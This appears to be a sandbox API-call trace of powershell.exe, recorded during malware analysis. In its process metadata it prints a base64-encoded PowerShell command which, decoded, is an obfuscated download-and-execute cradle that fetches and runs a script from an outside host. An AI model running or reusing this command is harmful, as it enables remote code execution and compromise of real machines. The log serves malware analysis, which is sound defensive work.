	[0875.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36d870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.647] CoTaskMemFree (pv=0x36d870) 
	[0876.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0876.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0889.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0889.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0890.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0890.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0909.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0909.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0917.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0917.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0926.661] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0926.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.662] CoTaskMemFree (pv=0x36da90) 
	[0926.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xeda80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0927.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0931.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0931.201] SetErrorMode (uMode=0x1) returned 0x1
	[0931.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xedc20 | out: lpFileInformation=0xedc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0931.201] SetErrorMode (uMode=0x1) returned 0x1
	[0963.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xeda80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.894] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0963.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.894] CoTaskMemFree (pv=0x36da90) 
	[0963.896] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0963.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.896] CoTaskMemFree (pv=0x36da90) 
	[0963.896] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0963.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.897] CoTaskMemFree (pv=0x36da90) 
	[0963.899] CoCreateGuid (in: pguid=0xedfe8 | out: pguid=0xedfe8*(Data1=0x729877b8, Data2=0x319c, Data3=0x4299, Data4=([0]=0x81, [1]=0x4b, [2]=0xeb, [3]=0xf2, [4]=0x39, [5]=0x1b, [6]=0x1b, [7]=0x6f))) returned 0x0
	[0963.902] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0963.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.902] CoTaskMemFree (pv=0x36da90) 
	[0963.905] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0963.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.905] CoTaskMemFree (pv=0x36da90) 
	[0963.907] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0963.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.907] CoTaskMemFree (pv=0x36da90) 
	[0963.927] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0964.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xedc90 | out: lpConsoleScreenBufferInfo=0xedc90) returned 1
	[0964.310] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0964.311] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xedc90 | out: lpConsoleScreenBufferInfo=0xedc90) returned 1
	[0964.314] GetCurrentProcess () returned 0xffffffffffffffff
	[0964.315] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xedcb8 | out: TokenHandle=0xedcb8*=0xe4) returned 1
	[0964.317] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xedbd8 | out: TokenInformation=0x0, ReturnLength=0xedbd8) returned 0
	[0964.318] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x30e450
	[0964.318] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x30e450, TokenInformationLength=0x4, ReturnLength=0xedbd8 | out: TokenInformation=0x30e450, ReturnLength=0xedbd8) returned 1
	[0964.320] DuplicateTokenEx (in: hExistingToken=0xe4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xedd38 | out: phNewToken=0xedd38*=0x2ec) returned 1
	[0964.320] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xedbd8 | out: TokenInformation=0x0, ReturnLength=0xedbd8) returned 0
	[0964.320] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x30e480
	[0964.320] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x30e480, TokenInformationLength=0x4, ReturnLength=0xedbd8 | out: TokenInformation=0x30e480, ReturnLength=0xedbd8) returned 1
	[0964.321] CheckTokenMembership (in: TokenHandle=0x2ec, SidToCheck=0x2b25bc8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xedd48 | out: IsMember=0xedd48) returned 1
	[0964.321] CloseHandle (hObject=0x2ec) returned 1
	[0964.812] CoTaskMemAlloc (cb=0x804) returned 0x1b695f50
	[0964.812] GetConsoleTitleW (in: lpConsoleTitle=0x1b695f50, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.812] CoTaskMemFree (pv=0x1b695f50) 
	[0964.827] CoTaskMemAlloc (cb=0x804) returned 0x1b696800
	[0964.827] GetConsoleTitleW (in: lpConsoleTitle=0x1b696800, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.827] CoTaskMemFree (pv=0x1b696800) 
	[0964.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.829] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0964.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.189] SetConsoleCtrlHandler (HandlerRoutine=0x229689c, Add=1) returned 1
	[0965.208] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0965.209] CoCreateGuid (in: pguid=0xede30 | out: pguid=0xede30*(Data1=0xde8c99fe, Data2=0x97e2, Data3=0x43ba, Data4=([0]=0xac, [1]=0x8, [2]=0x2e, [3]=0x2b, [4]=0x77, [5]=0x8e, [6]=0x8c, [7]=0x4b))) returned 0x0
	[0965.570] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0965.571] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.571] CoTaskMemFree (pv=0x36da90) 
	[0966.617] WinSqmIsOptedIn () returned 0x0
	[0966.617] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0966.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.617] CoTaskMemFree (pv=0x36da90) 
	[0966.618] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0966.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.618] CoTaskMemFree (pv=0x36da90) 
	[0967.554] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0967.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.554] CoTaskMemFree (pv=0x36da90) 
	[0967.554] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0967.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.555] CoTaskMemFree (pv=0x36da90) 
	[0967.555] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0967.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.555] CoTaskMemFree (pv=0x36da90) 
	[0968.989] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0968.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.989] CoTaskMemFree (pv=0x36da90) 
	[0968.990] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0968.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.990] CoTaskMemFree (pv=0x36da90) 
	[0968.990] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0968.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.990] CoTaskMemFree (pv=0x36da90) 
	[0968.999] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0968.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.999] CoTaskMemFree (pv=0x36da90) 
	[0970.320] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0970.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.321] CoTaskMemFree (pv=0x36da90) 
	[0970.324] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0970.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.325] CoTaskMemFree (pv=0x36da90) 
	[0970.325] CoTaskMemAlloc (cb=0x104) returned 0x36da90
	[0970.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x36da90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.325] CoTaskMemFree (pv=0x36da90) 

Thread:
	id = 557
	os_tid = 0xc40


Thread:
	id = 562
	os_tid = 0xc8c


Thread:
	id = 1222
	os_tid = 0x16b4


Thread:
	id = 1224
	os_tid = 0x144c


Thread:
	id = 1253
	os_tid = 0x1c40


Thread:
	id = 1318
	os_tid = 0x1dd4


Thread:
	id = 1588
	os_tid = 0x214c


Thread:
	id = 1599
	os_tid = 0x2174

	[0820.636] CoGetContextToken (in: pToken=0x1b38ef70 | out: pToken=0x1b38ef70) returned 0x0
	[0820.637] CObjectContext::QueryInterface () returned 0x0
	[0820.637] CObjectContext::GetCurrentThreadType () returned 0x0
	[0820.637] Release () returned 0x0
	[0820.637] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0897.082] RegCloseKey (hKey=0x2e8) returned 0x0
	[0897.082] RegCloseKey (hKey=0x2f0) returned 0x0
	[0897.082] RegCloseKey (hKey=0x2ec) returned 0x0

Thread:
	id = 1938
	os_tid = 0x262c


Process:
	id = "104"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x18fb3000"
	os_pid = "0x1394"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 538
	os_tid = 0x1398

	[0525.555] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0528.212] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0528.212] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0528.212] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0528.212] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0539.276] GetVersionExW (in: lpVersionInformation=0x10dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0539.278] GetVersionExW (in: lpVersionInformation=0x10dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0539.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.290] GetVersionExW (in: lpVersionInformation=0x10dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0539.291] SetErrorMode (uMode=0x1) returned 0x1
